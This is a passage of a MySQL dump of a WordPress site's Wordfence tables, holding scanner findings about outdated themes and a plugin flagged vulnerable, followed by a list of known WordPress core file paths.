Scan\";s:9:\"PluginURI\";s:20:\"https://wpcerber.com\";s:7:\"Version\";s:5:\"8.8.5\";s:11:\"Description\";s:408:\"Defends WordPress against hacker attacks, spam, trojans, and viruses. Malware scanner and integrity checker. Hardening WordPress with a set of comprehensive security algorithms. Spam protection with a sophisticated bot detection engine and reCAPTCHA. Tracks user and intruder activity with powerful email, mobile and desktop notifications. <cite>By <a href=\"https://wpcerber.com\">Cerber Tech Inc.</a>.</cite>\";s:6:\"Author\";s:51:\"<a href=\"https://wpcerber.com\">Cerber Tech Inc.</a>\";s:9:\"AuthorURI\";s:20:\"https://wpcerber.com\";s:10:\"TextDomain\";s:9:\"wp-cerber\";s:10:\"DomainPath\";s:10:\"/languages\";s:7:\"Network\";b:1;s:10:\"RequiresWP\";s:0:\"\";s:11:\"RequiresPHP\";s:0:\"\";s:5:\"Title\";s:83:\"<a href=\"https://wpcerber.com\">WP Cerber Security, Anti-spam & Malware Scan</a>\";s:10:\"AuthorName\";s:16:\"Cerber Tech Inc.\";s:10:\"pluginFile\";s:80:\"/home/dogstardesign.co.uk/public_html/wp-content/plugins/wp-cerber/wp-cerber.php\";s:10:\"newVersion\";s:5:\"8.9.3\";s:4:\"slug\";s:9:\"wp-cerber\";s:5:\"wpURL\";s:39:\"https://wordpress.org/plugins/wp-cerber\";s:10:\"vulnerable\";b:1;s:17:\"vulnerabilityLink\";s:73:\"https://wpvulndb.com/vulnerabilities/0c06abf1-f01f-4268-a105-02b1327427cf\";}'),(34773,1631615573,1631615573,'new','wfThemeUpgrade',50,'d0fd5c3317d8624e62cf86316fb563d5','d0fd5c3317d8624e62cf86316fb563d5','The Theme \"Advance\" needs an upgrade (1.1.9 -> 1.9.0).','You need to upgrade \"Advance\" to the newest version to ensure you have any security fixes the developer has released.','a:7:{s:10:\"newVersion\";s:5:\"1.9.0\";s:7:\"package\";s:55:\"https://downloads.wordpress.org/theme/advance.1.9.0.zip\";s:3:\"URL\";s:37:\"https://wordpress.org/themes/advance/\";s:4:\"Name\";s:7:\"Advance\";s:4:\"name\";s:7:\"Advance\";s:7:\"version\";s:5:\"1.1.9\";s:10:\"vulnerable\";b:0;}'),(34774,1631615573,1631615573,'new','wfThemeUpgrade',50,'79b4286a1f7d596507eaf8b386b714a8','79b4286a1f7d596507eaf8b386b714a8','The Theme \"Anima\" needs an upgrade (1.0.2 -> 1.4.1).','You need to upgrade \"Anima\" to the newest version to ensure you have any security fixes the developer has released.','a:7:{s:10:\"newVersion\";s:5:\"1.4.1\";s:7:\"package\";s:53:\"https://downloads.wordpress.org/theme/anima.1.4.1.zip\";s:3:\"URL\";s:35:\"https://wordpress.org/themes/anima/\";s:4:\"Name\";s:5:\"Anima\";s:4:\"name\";s:5:\"Anima\";s:7:\"version\";s:5:\"1.0.2\";s:10:\"vulnerable\";b:0;}'),(34775,1631615573,1631615573,'new','wfThemeUpgrade',50,'bd61b86a185185992212307fcda8f939','bd61b86a185185992212307fcda8f939','The Theme \"Auberge\" needs an upgrade (2.1.1 -> 2.7.6).','You need to upgrade \"Auberge\" to the newest version to ensure you have any security fixes the developer has released.','a:7:{s:10:\"newVersion\";s:5:\"2.7.6\";s:7:\"package\";s:55:\"https://downloads.wordpress.org/theme/auberge.2.7.6.zip\";s:3:\"URL\";s:37:\"https://wordpress.org/themes/auberge/\";s:4:\"Name\";s:7:\"Auberge\";s:4:\"name\";s:7:\"Auberge\";s:7:\"version\";s:5:\"2.1.1\";s:10:\"vulnerable\";b:0;}'),(34776,1631615573,1631615573,'new','wfThemeUpgrade',50,'cc03e2c196d372e6b76d45e2e87dc0a2','cc03e2c196d372e6b76d45e2e87dc0a2','The Theme \"Cactus\" needs an upgrade (1.0.5 -> 1.3.5).','You need to upgrade \"Cactus\" to the newest version to ensure you have any security fixes the developer has released.','a:7:{s:10:\"newVersion\";s:5:\"1.3.5\";s:7:\"package\";s:54:\"https://downloads.wordpress.org/theme/cactus.1.3.5.zip\";s:3:\"URL\";s:36:\"https://wordpress.org/themes/cactus/\";s:4:\"Name\";s:6:\"Cactus\";s:4:\"name\";s:6:\"Cactus\";s:7:\"version\";s:5:\"1.0.5\";s:10:\"vulnerable\";b:0;}'),(34777,1631615573,1631615573,'new','wfThemeUpgrade',50,'8603139454f7c076e31ae2d55c73cf0a','8603139454f7c076e31ae2d55c73cf0a','The Theme \"Capacious\" needs an upgrade (0.0.4 -> 1.1.1).','You need to upgrade \"Capacious\" to the newest version to ensure you have any security fixes the developer has released.','a:7:{s:10:\"newVersion\";s:5:\"1.1.1\";s:7:\"package\";s:57:\"https://downloads.wordpress.org/theme/capacious.1.1.1.zip\";s:3:\"URL\";s:39:\"https://wordpress.org/themes/capacious/\";s:4:\"Name\";s:9:\"Capacious\";s:4:\"name\";s:9:\"Capacious\";s:7:\"version\";s:5:\"0.0.4\";s:10:\"vulnerable\";b:0;}'),(34778,1631615573,1631615573,'new','wfThemeUpgrade',50,'7eeca5238ce2a75fe64eec4bd4934833','7eeca5238ce2a75fe64eec4bd4934833','The Theme \"Event\" needs an upgrade (1.0.7 -> 1.1.8).','You need to upgrade \"Event\" to the newest version to ensure you have any security fixes the developer has released.','a:7:{s:10:\"newVersion\";s:5:\"1.1.8\";s:7:\"package\";s:53:\"https://downloads.wordpress.org/theme/event.1.1.8.zip\";s:3:\"URL\";s:35:\"https://wordpress.org/themes/event/\";s:4:\"Name\";s:5:\"Event\";s:4:\"name\";s:5:\"Event\";s:7:\"version\";s:5:\"1.0.7\";s:10:\"vulnerable\";b:0;}'),(34779,1631615574,1631615574,'new','wfThemeUpgrade',50,'9a746fb393362c9b3c1798461c6a780c','9a746fb393362c9b3c1798461c6a780c','The Theme \"FastBlog\" needs an upgrade (1.0.6 -> 1.6.5).','You need to upgrade \"FastBlog\" to the newest version to ensure you have any security fixes the developer has released.','a:7:{s:10:\"newVersion\";s:5:\"1.6.5\";s:7:\"package\";s:56:\"https://downloads.wordpress.org/theme/fastblog.1.6.5.zip\";s:3:\"URL\";s:38:\"https://wordpress.org/themes/fastblog/\";s:4:\"Name\";s:8:\"FastBlog\";s:4:\"name\";s:8:\"FastBlog\";s:7:\"version\";s:5:\"1.0.6\";s:10:\"vulnerable\";b:0;}'),(34780,1631615574,1631615574,'new','wfThemeUpgrade',50,'ee7a594c36f4384d81bcb8fa81318426','ee7a594c36f4384d81bcb8fa81318426','The Theme \"Gambit\" needs an upgrade (1.0.8 -> 2.0.4).','You need to upgrade \"Gambit\" to the newest version to ensure you have any security fixes the developer has released.','a:7:{s:10:\"newVersion\";s:5:\"2.0.4\";s:7:\"package\";s:54:\"https://downloads.wordpress.org/theme/gambit.2.0.4.zip\";s:3:\"URL\";s:36:\"https://wordpress.org/themes/gambit/\";s:4:\"Name\";s:6:\"Gambit\";s:4:\"name\";s:6:\"Gambit\";s:7:\"version\";s:5:\"1.0.8\";s:10:\"vulnerable\";b:0;}'),(34781,1631615574,1631615574,'new','wfThemeUpgrade',100,'db68da756bacb62ef5c2f6260a4acca9','db68da756bacb62ef5c2f6260a4acca9','The Theme \"Hueman\" needs an upgrade (3.2.10 -> 3.7.15).','You need to upgrade \"Hueman\" to the newest version to ensure you have any security fixes the developer has released.','a:7:{s:10:\"newVersion\";s:6:\"3.7.15\";s:7:\"package\";s:55:\"https://downloads.wordpress.org/theme/hueman.3.7.15.zip\";s:3:\"URL\";s:36:\"https://wordpress.org/themes/hueman/\";s:4:\"Name\";s:6:\"Hueman\";s:4:\"name\";s:6:\"Hueman\";s:7:\"version\";s:6:\"3.2.10\";s:10:\"vulnerable\";b:1;}'),(34782,1631615574,1631615574,'new','wfThemeUpgrade',50,'d08ca6735bf645978cefcb1cf91c88b6','d08ca6735bf645978cefcb1cf91c88b6','The Theme \"Kidzoo Lite\" needs an upgrade (1.0.7 -> 1.1).','You need to upgrade \"Kidzoo Lite\" to the newest version to ensure you have any security fixes the developer has released.','a:7:{s:10:\"newVersion\";s:3:\"1.1\";s:7:\"package\";s:57:\"https://downloads.wordpress.org/theme/kidzoo-lite.1.1.zip\";s:3:\"URL\";s:41:\"https://wordpress.org/themes/kidzoo-lite/\";s:4:\"Name\";s:11:\"Kidzoo Lite\";s:4:\"name\";s:11:\"Kidzoo Lite\";s:7:\"version\";s:5:\"1.0.7\";s:10:\"vulnerable\";b:0;}'),(34783,1631615574,1631615574,'new','wfThemeUpgrade',50,'9d99a97a3ef7c16b5ccf8a60d9bfa7df','9d99a97a3ef7c16b5ccf8a60d9bfa7df','The Theme \"MaxBusiness\" needs an upgrade (1.3 -> 1.4).','You need to upgrade \"MaxBusiness\" to the newest version to ensure you have any security fixes the developer has released.','a:7:{s:10:\"newVersion\";s:3:\"1.4\";s:7:\"package\";s:57:\"https://downloads.wordpress.org/theme/maxbusiness.1.4.zip\";s:3:\"URL\";s:41:\"https://wordpress.org/themes/maxbusiness/\";s:4:\"Name\";s:11:\"MaxBusiness\";s:4:\"name\";s:11:\"MaxBusiness\";s:7:\"version\";s:3:\"1.3\";s:10:\"vulnerable\";b:0;}'),(34784,1631615574,1631615574,'new','wfThemeUpgrade',50,'a00711ffbaeebf976f984d2e37d591a6','a00711ffbaeebf976f984d2e37d591a6','The Theme \"NewsMag\" needs an upgrade (2.1.6 -> 2.4.3).','You need to upgrade \"NewsMag\" to the newest version to ensure you have any security fixes the developer has released.','a:7:{s:10:\"newVersion\";s:5:\"2.4.3\";s:7:\"package\";s:55:\"https://downloads.wordpress.org/theme/newsmag.2.4.3.zip\";s:3:\"URL\";s:37:\"https://wordpress.org/themes/newsmag/\";s:4:\"Name\";s:7:\"NewsMag\";s:4:\"name\";s:7:\"NewsMag\";s:7:\"version\";s:5:\"2.1.6\";s:10:\"vulnerable\";b:0;}'),(34785,1631615574,1631615574,'new','wfThemeUpgrade',50,'8c3bd09c6618edb429806b816c3de1dd','8c3bd09c6618edb429806b816c3de1dd','The Theme \"SG Window\" needs an upgrade (1.2.1 -> 1.2.3).','You need to upgrade \"SG Window\" to the newest version to ensure you have any security fixes the developer has released.','a:7:{s:10:\"newVersion\";s:5:\"1.2.3\";s:7:\"package\";s:57:\"https://downloads.wordpress.org/theme/sg-window.1.2.3.zip\";s:3:\"URL\";s:39:\"https://wordpress.org/themes/sg-window/\";s:4:\"Name\";s:9:\"SG Window\";s:4:\"name\";s:9:\"SG Window\";s:7:\"version\";s:5:\"1.2.1\";s:10:\"vulnerable\";b:0;}'),(34786,1631615574,1631615574,'new','wfThemeUpgrade',50,'6b7669fec5526fdded730040224b9d89','6b7669fec5526fdded730040224b9d89','The Theme \"ShopOne\" needs an upgrade (1.1 -> 1.3).','You need to upgrade \"ShopOne\" to the newest version to ensure you have any security fixes the developer has released.','a:7:{s:10:\"newVersion\";s:3:\"1.3\";s:7:\"package\";s:53:\"https://downloads.wordpress.org/theme/shopone.1.3.zip\";s:3:\"URL\";s:37:\"https://wordpress.org/themes/shopone/\";s:4:\"Name\";s:7:\"ShopOne\";s:4:\"name\";s:7:\"ShopOne\";s:7:\"version\";s:3:\"1.1\";s:10:\"vulnerable\";b:0;}'),(34787,1631615574,1631615574,'new','wfThemeUpgrade',50,'61cad69d33e2a71704f815c86d6e1def','61cad69d33e2a71704f815c86d6e1def','The Theme \"SpiderMag\" needs an upgrade (1.0.8 -> 1.1.6).','You need to upgrade \"SpiderMag\" to the newest version to ensure you have any security fixes the developer has released.','a:7:{s:10:\"newVersion\";s:5:\"1.1.6\";s:7:\"package\";s:57:\"https://downloads.wordpress.org/theme/spidermag.1.1.6.zip\";s:3:\"URL\";s:39:\"https://wordpress.org/themes/spidermag/\";s:4:\"Name\";s:9:\"SpiderMag\";s:4:\"name\";s:9:\"SpiderMag\";s:7:\"version\";s:5:\"1.0.8\";s:10:\"vulnerable\";b:0;}'),(34788,1631615574,1631615574,'new','wfThemeUpgrade',50,'a02d16d641f615acb5820ef521b582bc','a02d16d641f615acb5820ef521b582bc','The Theme \"StoreOne\" needs an upgrade (1.4 -> 2.1.5).','You need to upgrade \"StoreOne\" to the newest version to ensure you have any security fixes the developer has released.','a:7:{s:10:\"newVersion\";s:5:\"2.1.5\";s:7:\"package\";s:56:\"https://downloads.wordpress.org/theme/storeone.2.1.5.zip\";s:3:\"URL\";s:38:\"https://wordpress.org/themes/storeone/\";s:4:\"Name\";s:8:\"StoreOne\";s:4:\"name\";s:8:\"StoreOne\";s:7:\"version\";s:3:\"1.4\";s:10:\"vulnerable\";b:0;}'),(34789,1631615574,1631615574,'new','wfThemeUpgrade',50,'b1f40133224ebd37d11a57212569e7b7','b1f40133224ebd37d11a57212569e7b7','The Theme \"Twenty Nineteen\" needs an upgrade (2.0 -> 2.1).','You need to upgrade \"Twenty Nineteen\" to the newest version to ensure you have any security fixes the developer has released.','a:7:{s:10:\"newVersion\";s:3:\"2.1\";s:7:\"package\";s:60:\"https://downloads.wordpress.org/theme/twentynineteen.2.1.zip\";s:3:\"URL\";s:44:\"https://wordpress.org/themes/twentynineteen/\";s:4:\"Name\";s:15:\"Twenty Nineteen\";s:4:\"name\";s:15:\"Twenty Nineteen\";s:7:\"version\";s:3:\"2.0\";s:10:\"vulnerable\";b:0;}'),(34790,1631615574,1631615574,'new','wfThemeUpgrade',50,'b4aa3a5a0b6b6ad3791cccd0ead6da3c','b4aa3a5a0b6b6ad3791cccd0ead6da3c','The Theme \"Twenty Twenty\" needs an upgrade (1.7 -> 1.8).','You need to upgrade \"Twenty Twenty\" to the newest version to ensure you have any security fixes the developer has released.','a:7:{s:10:\"newVersion\";s:3:\"1.8\";s:7:\"package\";s:58:\"https://downloads.wordpress.org/theme/twentytwenty.1.8.zip\";s:3:\"URL\";s:42:\"https://wordpress.org/themes/twentytwenty/\";s:4:\"Name\";s:13:\"Twenty Twenty\";s:4:\"name\";s:13:\"Twenty Twenty\";s:7:\"version\";s:3:\"1.7\";s:10:\"vulnerable\";b:0;}'),(34791,1631615574,1631615574,'new','wfThemeUpgrade',50,'2fe1115c1ca9c416ae1e8e7aea44d03e','2fe1115c1ca9c416ae1e8e7aea44d03e','The Theme \"Twenty Twenty-One\" needs an upgrade (1.3 -> 1.4).','You need to upgrade \"Twenty Twenty-One\" to the newest version to ensure you have any security fixes the developer has released.','a:7:{s:10:\"newVersion\";s:3:\"1.4\";s:7:\"package\";s:61:\"https://downloads.wordpress.org/theme/twentytwentyone.1.4.zip\";s:3:\"URL\";s:45:\"https://wordpress.org/themes/twentytwentyone/\";s:4:\"Name\";s:17:\"Twenty Twenty-One\";s:4:\"name\";s:17:\"Twenty Twenty-One\";s:7:\"version\";s:3:\"1.3\";s:10:\"vulnerable\";b:0;}'),(34792,1631615574,1631615574,'new','wfThemeUpgrade',50,'b887a0391ee978888cd65256afab7d02','b887a0391ee978888cd65256afab7d02','The Theme \"Vision Lite\" needs an upgrade (1.1.3 -> 1.1.6).','You need to upgrade \"Vision Lite\" to the newest version to ensure you have any security fixes the developer has released.','a:7:{s:10:\"newVersion\";s:5:\"1.1.6\";s:7:\"package\";s:59:\"https://downloads.wordpress.org/theme/vision-lite.1.1.6.zip\";s:3:\"URL\";s:41:\"https://wordpress.org/themes/vision-lite/\";s:4:\"Name\";s:11:\"Vision Lite\";s:4:\"name\";s:11:\"Vision Lite\";s:7:\"version\";s:5:\"1.1.3\";s:10:\"vulnerable\";b:0;}'),(34793,1631615574,1631615574,'new','wfThemeUpgrade',50,'e0fddaf7a7f70eb435060d9793c829cc','e0fddaf7a7f70eb435060d9793c829cc','The Theme \"Weblog\" needs an upgrade (1.0.1 -> 3.0.4).','You need to upgrade \"Weblog\" to the newest version to ensure you have any security fixes the developer has released.','a:7:{s:10:\"newVersion\";s:5:\"3.0.4\";s:7:\"package\";s:54:\"https://downloads.wordpress.org/theme/weblog.3.0.4.zip\";s:3:\"URL\";s:36:\"https://wordpress.org/themes/weblog/\";s:4:\"Name\";s:6:\"Weblog\";s:4:\"name\";s:6:\"Weblog\";s:7:\"version\";s:5:\"1.0.1\";s:10:\"vulnerable\";b:0;}'),(34794,1631615574,1631615574,'new','wfThemeUpgrade',50,'296c028b88ba7d2257d0c43d1527b292','296c028b88ba7d2257d0c43d1527b292','The Theme \"WP Barrister\" needs an upgrade (1.0.9 -> 2.3.1).','You need to upgrade \"WP Barrister\" to the newest version to ensure you have any security fixes the developer has released.','a:7:{s:10:\"newVersion\";s:5:\"2.3.1\";s:7:\"package\";s:60:\"https://downloads.wordpress.org/theme/wp-barrister.2.3.1.zip\";s:3:\"URL\";s:42:\"https://wordpress.org/themes/wp-barrister/\";s:4:\"Name\";s:12:\"WP Barrister\";s:4:\"name\";s:12:\"WP Barrister\";s:7:\"version\";s:5:\"1.0.9\";s:10:\"vulnerable\";b:0;}');
/*!40000 ALTER TABLE `wp_wfissues` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `wp_wfknownfilelist`
--
DROP TABLE IF EXISTS `wp_wfknownfilelist`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_wfknownfilelist` (
`id` int(11) unsigned NOT NULL AUTO_INCREMENT,
`path` text NOT NULL,
PRIMARY KEY (`id`)
) ENGINE=InnoDB AUTO_INCREMENT=7062 DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `wp_wfknownfilelist`
--
LOCK TABLES `wp_wfknownfilelist` WRITE;
/*!40000 ALTER TABLE `wp_wfknownfilelist` DISABLE KEYS */;
INSERT INTO `wp_wfknownfilelist` VALUES (1,'index.php'),(2,'license.txt'),(3,'readme.html'),(4,'wordfence-waf.php'),(5,'wp-activate.php'),(6,'wp-admin/about.php'),(7,'wp-admin/admin-ajax.php'),(8,'wp-admin/admin-footer.php'),(9,'wp-admin/admin-functions.php'),(10,'wp-admin/admin-header.php'),(11,'wp-admin/admin-post.php'),(12,'wp-admin/admin.php'),(13,'wp-admin/async-upload.php'),(14,'wp-admin/authorize-application.php'),(15,'wp-admin/comment.php'),(16,'wp-admin/credits.php'),(17,'wp-admin/css/about-rtl.css'),(18,'wp-admin/css/about-rtl.min.css'),(19,'wp-admin/css/about.css'),(20,'wp-admin/css/about.min.css'),(21,'wp-admin/css/admin-menu-rtl.css'),(22,'wp-admin/css/admin-menu-rtl.min.css'),(23,'wp-admin/css/admin-menu.css'),(24,'wp-admin/css/admin-menu.min.css'),(25,'wp-admin/css/code-editor-rtl.css'),(26,'wp-admin/css/code-editor-rtl.min.css'),(27,'wp-admin/css/code-editor.css'),(28,'wp-admin/css/code-editor.min.css'),(29,'wp-admin/css/color-picker-rtl.css'),(30,'wp-admin/css/color-picker-rtl.min.css'),(31,'wp-admin/css/color-picker.css'),(32,'wp-admin/css/color-picker.min.css'),(33,'wp-admin/css/colors/_admin.scss'),(34,'wp-admin/css/colors/_mixins.scss'),(35,'wp-admin/css/colors/_variables.scss'),(36,'wp-admin/css/colors/blue/colors-rtl.css'),(37,'wp-admin/css/colors/blue/colors-rtl.min.css'),(38,'wp-admin/css/colors/blue/colors.css'),(39,'wp-admin/css/colors/blue/colors.min.css'),(40,'wp-admin/css/colors/blue/colors.scss'),(41,'wp-admin/css/colors/coffee/colors-rtl.css'),(42,'wp-admin/css/colors/coffee/colors-rtl.min.css'),(43,'wp-admin/css/colors/coffee/colors.css'),(44,'wp-admin/css/colors/coffee/colors.min.css'),(45,'wp-admin/css/colors/coffee/colors.scss'),(46,'wp-admin/css/colors/ectoplasm/colors-rtl.css'),(47,'wp-admin/css/colors/ectoplasm/colors-rtl.min.css'),(48,'wp-admin/css/colors/ectoplasm/colors.css'),(49,'wp-admin/css/colors/ectoplasm/colors.min.css'),(50,'wp-admin/css/colors/ectoplasm/colors.scss'),(51,'wp-admin/css/colors/light/colors-rtl.css'),(52,'wp-admin/css/colors/light/colors-rtl.min.css'),(53,'wp-admin/css/colors/light/colors.css'),(54,'wp-admin/css/colors/light/colors.min.css'),(55,'wp-admin/css/colors/light/colors.scss'),(56,'wp-admin/css/colors/midnight/colors-rtl.css'),(57,'wp-admin/css/colors/midnight/colors-rtl.min.css'),(58,'wp-admin/css/colors/midnight/colors.css'),(59,'wp-admin/css/colors/midnight/colors.min.css'),(60,'wp-admin/css/colors/midnight/colors.scss'),(61,'wp-admin/css/colors/modern/colors-rtl.css'),(62,'wp-admin/css/colors/modern/colors-rtl.min.css'),(63,'wp-admin/css/colors/modern/colors.css'),(64,'wp-admin/css/colors/modern/colors.min.css'),(65,'wp-admin/css/colors/modern/colors.scss'),(66,'wp-admin/css/colors/ocean/colors-rtl.css'),(67,'wp-admin/css/colors/ocean/colors-rtl.min.css'),(68,'wp-admin/css/colors/ocean/colors.css'),(69,'wp-admin/css/colors/ocean/colors.min.css'),(70,'wp-admin/css/colors/ocean/colors.scss'),(71,'wp-admin/css/colors/sunrise/colors-rtl.css'),(72,'wp-admin/css/colors/sunrise/colors-rtl.min.css'),(73,'wp-admin/css/colors/sunrise/colors.css'),(74,'wp-admin/css/colors/sunrise/colors.min.css'),(75,'wp-admin/css/colors/sunrise/colors.scss'),(76,'wp-admin/css/common-rtl.css'),(77,'wp-admin/css/common-rtl.min.css'),(78,'wp-admin/css/common.css'),(79,'wp-admin/css/common.min.css'),(80,'wp-admin/css/customize-controls-rtl.css'),(81,'wp-admin/css/customize-controls-rtl.min.css'),(82,'wp-admin/css/customize-controls.css'),(83,'wp-admin/css/customize-controls.min.css'),(84,'wp-admin/css/customize-nav-menus-rtl.css'),(85,'wp-admin/css/customize-nav-menus-rtl.min.css'),(86,'wp-admin/css/customize-nav-menus.css'),(87,'wp-admin/css/customize-nav-menus.min.css'),(88,'wp-admin/css/customize-widgets-rtl.css'),(89,'wp-admin/css/customize-widgets-rtl.min.css'),(90,'wp-admin/css/customize-widgets.css'),(91,'wp-admin/css/customize-widgets.min.css'),(92,'wp-admin/css/dashboard-rtl.css'),(93,'wp-admin/css/dashboard-rtl.min.css'),(94,'wp-admin/css/dashboard.css'),(95,'wp-admin/css/dashboard.min.css'),(96,'wp-admin/css/deprecated-media-rtl.css'),(97,'wp-admin/css/deprecated-media-rtl.min.css'),(98,'wp-admin/css/deprecated-media.css'),(99,'wp-admin/css/deprecated-media.min.css'),(100,'wp-admin/css/edit-rtl.css'),(101,'wp-admin/css/edit-rtl.min.css'),(102,'wp-admin/css/edit.css'),(103,'wp-admin/css/edit.min.css'),(104,'wp-admin/css/farbtastic-rtl.css'),(105,'wp-admin/css/farbtastic-rtl.min.css'),(106,'wp-admin/css/farbtastic.css'),(107,'wp-admin/css/farbtastic.min.css'),(108,'wp-admin/css/forms-rtl.css'),(109,'wp-admin/css/forms-rtl.min.css'),(110,'wp-admin/css/forms.css'),(111,'wp-admin/css/forms.min.css'),(112,'wp-admin/css/install-rtl.css'),(113,'wp-admin/css/install-rtl.min.css'),(114,'wp-admin/css/install.css'),(115,'wp-admin/css/install.min.css'),(116,'wp-admin/css/l10n-rtl.css'),(117,'wp-admin/css/l10n-rtl.min.css'),(118,'wp-admin/css/l10n.css'),(119,'wp-admin/css/l10n.min.css'),(120,'wp-admin/css/list-tables-rtl.css'),(121,'wp-admin/css/list-tables-rtl.min.css'),(122,'wp-admin/css/list-tables.css'),(123,'wp-admin/css/list-tables.min.css'),(124,'wp-admin/css/login-rtl.css'),(125,'wp-admin/css/login-rtl.min.css'),(126,'wp-admin/css/login.css'),(127,'wp-admin/css/login.min.css'),(128,'wp-admin/css/media-rtl.css'),(129,'wp-admin/css/media-rtl.min.css'),(130,'wp-admin/css/media.css'),(131,'wp-admin/css/media.min.css'),(132,'wp-admin/css/nav-menus-rtl.css'),(133,'wp-admin/css/nav-menus-rtl.min.css'),(134,'wp-admin/css/nav-menus.css'),(135,'wp-admin/css/nav-menus.min.css'),(136,'wp-admin/css/revisions-rtl.css'),(137,'wp-admin/css/revisions-rtl.min.css'),(138,'wp-admin/css/revisions.css'),(139,'wp-admin/css/revisions.min.css'),(140,'wp-admin/css/site-health-rtl.css'),(141,'wp-admin/css/site-health-rtl.min.css'),(142,'wp-admin/css/site-health.css'),(143,'wp-admin/css/site-health.min.css'),(144,'wp-admin/css/site-icon-rtl.css'),(145,'wp-admin/css/site-icon-rtl.min.css'),(146,'wp-admin/css/site-icon.css'),(147,'wp-admin/css/site-icon.min.css'),(148,'wp-admin/css/themes-rtl.css'),(149,'wp-admin/css/themes-rtl.min.css'),(150,'wp-admin/css/themes.css'),(151,'wp-admin/css/themes.min.css'),(152,'wp-admin/css/widgets-rtl.css'),(153,'wp-admin/css/widgets-rtl.min.css'),(154,'wp-admin/css/widgets.css'),(155,'wp-admin/css/widgets.min.css'),(156,'wp-admin/css/wp-admin-rtl.css'),(157,'wp-admin/css/wp-admin-rtl.min.css'),(158,'wp-admin/css/wp-admin.css'),(159,'wp-admin/css/wp-admin.min.css'),(160,'wp-admin/custom-background.php'),(161,'wp-admin/custom-header.php'),(162,'wp-admin/customize.php'),(163,'wp-admin/edit-comments.php'),(164,'wp-admin/edit-form-advanced.php'),(165,'wp-admin/edit-form-blocks.php'),(166,'wp-admin/edit-form-comment.php'),(167,'wp-admin/edit-link-form.php'),(168,'wp-admin/edit-tag-form.php'),(169,'wp-admin/edit-tags.php'),(170,'wp-admin/edit.php'),(171,'wp-admin/erase-personal-data.php'),(172,'wp-admin/export-personal-data.php'),(173,'wp-admin/export.php'),(174,'wp-admin/freedoms.php'),(175,'wp-admin/images/about-badge.svg'),(176,'wp-admin/images/about-color-palette-vert.svg'),(177,'wp-admin/images/about-color-palette.svg'),(178,'wp-admin/images/about-header-brushes.svg'),(179,'wp-admin/images/align-center-2x.png'),(180,'wp-admin/images/align-center.png'),(181,'wp-admin/images/align-left-2x.png'),(182,'wp-admin/images/align-left.png'),(183,'wp-admin/images/align-none-2x.png'),(184,'wp-admin/images/align-none.png'),(185,'wp-admin/images/align-right-2x.png'),(186,'wp-admin/images/align-right.png'),(187,'wp-admin/images/arrows-2x.png'),(188,'wp-admin/images/arrows.png'),(189,'wp-admin/images/browser-rtl.png'),(190,'wp-admin/images/browser.png'),(191,'wp-admin/images/bubble_bg-2x.gif'),(192,'wp-admin/images/bubble_bg.gif'),(193,'wp-admin/images/comment-grey-bubble-2x.png'),(194,'wp-admin/images/comment-grey-bubble.png'),(195,'wp-admin/images/date-button-2x.gif'),(196,'wp-admin/images/date-button.gif'),(197,'wp-admin/images/freedoms.png'),(198,'wp-admin/images/generic.png'),(199,'wp-admin/images/icons32-2x.png'),(200,'wp-admin/images/icons32-vs-2x.png'),(201,'wp-admin/images/icons32-vs.png'),(202,'wp-admin/images/icons32.png'),(203,'wp-admin/images/imgedit-icons-2x.png'),(204,'wp-admin/images/imgedit-icons.png'),(205,'wp-admin/images/list-2x.png'),(206,'wp-admin/images/list.png'),(207,'wp-admin/images/loading.gif'),(208,'wp-admin/images/marker.png'),(209,'wp-admin/images/mask.png'),(210,'wp-admin/images/media-button-2x.png'),(211,'wp-admin/images/media-button-image.gif'),(212,'wp-admin/images/media-button-music.gif'),(213,'wp-admin/images/media-button-other.gif'),(214,'wp-admin/images/media-button-video.gif'),(215,'wp-admin/images/media-button.png'),(216,'wp-admin/images/menu-2x.png'),(217,'wp-admin/images/menu-vs-2x.png'),(218,'wp-admin/images/menu-vs.png'),(219,'wp-admin/images/menu.png'),(220,'wp-admin/images/no.png'),(221,'wp-admin/images/post-formats-vs.png'),(222,'wp-admin/images/post-formats.png'),(223,'wp-admin/images/post-formats32-vs.png'),(224,'wp-admin/images/post-formats32.png'),(225,'wp-admin/images/privacy.png'),(226,'wp-admin/images/resize-2x.gif'),(227,'wp-admin/images/resize-rtl-2x.gif'),(228,'wp-admin/images/resize-rtl.gif'),(229,'wp-admin/images/resize.gif'),(230,'wp-admin/images/se.png'),(231,'wp-admin/images/sort-2x.gif'),(232,'wp-admin/images/sort.gif'),(233,'wp-admin/images/spinner-2x.gif'),(234,'wp-admin/images/spinner.gif'),(235,'wp-admin/images/stars-2x.png'),(236,'wp-admin/images/stars.png'),(237,'wp-admin/images/w-logo-blue.png'),(238,'wp-admin/images/w-logo-white.png'),(239,'wp-admin/images/wheel.png'),(240,'wp-admin/images/wordpress-logo-white.svg'),(241,'wp-admin/images/wordpress-logo.png'),(242,'wp-admin/images/wordpress-logo.svg'),(243,'wp-admin/images/wpspin_light-2x.gif'),(244,'wp-admin/images/wpspin_light.gif'),(245,'wp-admin/images/xit-2x.gif'),(246,'wp-admin/images/xit.gif'),(247,'wp-admin/images/yes.png'),(248,'wp-admin/import.php'),(249,'wp-admin/includes/admin-filters.php'),(250,'wp-admin/includes/admin.php'),(251,'wp-admin/includes/ajax-actions.php'),(252,'wp-admin/includes/bookmark.php'),(253,'wp-admin/includes/class-automatic-upgrader-skin.php'),(254,'wp-admin/includes/class-bulk-plugin-upgrader-skin.php'),(255,'wp-admin/includes/class-bulk-theme-upgrader-skin.php'),(256,'wp-admin/includes/class-bulk-upgrader-skin.php'),(257,'wp-admin/includes/class-core-upgrader.php'),(258,'wp-admin/includes/class-custom-background.php'),(259,'wp-admin/includes/class-custom-image-header.php'),(260,'wp-admin/includes/class-file-upload-upgrader.php'),(261,'wp-admin/includes/class-ftp-pure.php'),(262,'wp-admin/includes/class-ftp-sockets.php'),(263,'wp-admin/includes/class-ftp.php'),(264,'wp-admin/includes/class-language-pack-upgrader-skin.php'),(265,'wp-admin/includes/class-language-pack-upgrader.php'),(266,'wp-admin/includes/class-pclzip.php'),(267,'wp-admin/includes/class-plugin-installer-skin.php'),(268,'wp-admin/includes/class-plugin-upgrader-skin.php'),(269,'wp-admin/includes/class-plugin-upgrader.php'),(270,'wp-admin/includes/class-theme-installer-skin.php'),(271,'wp-admin/includes/class-theme-upgrader-skin.php'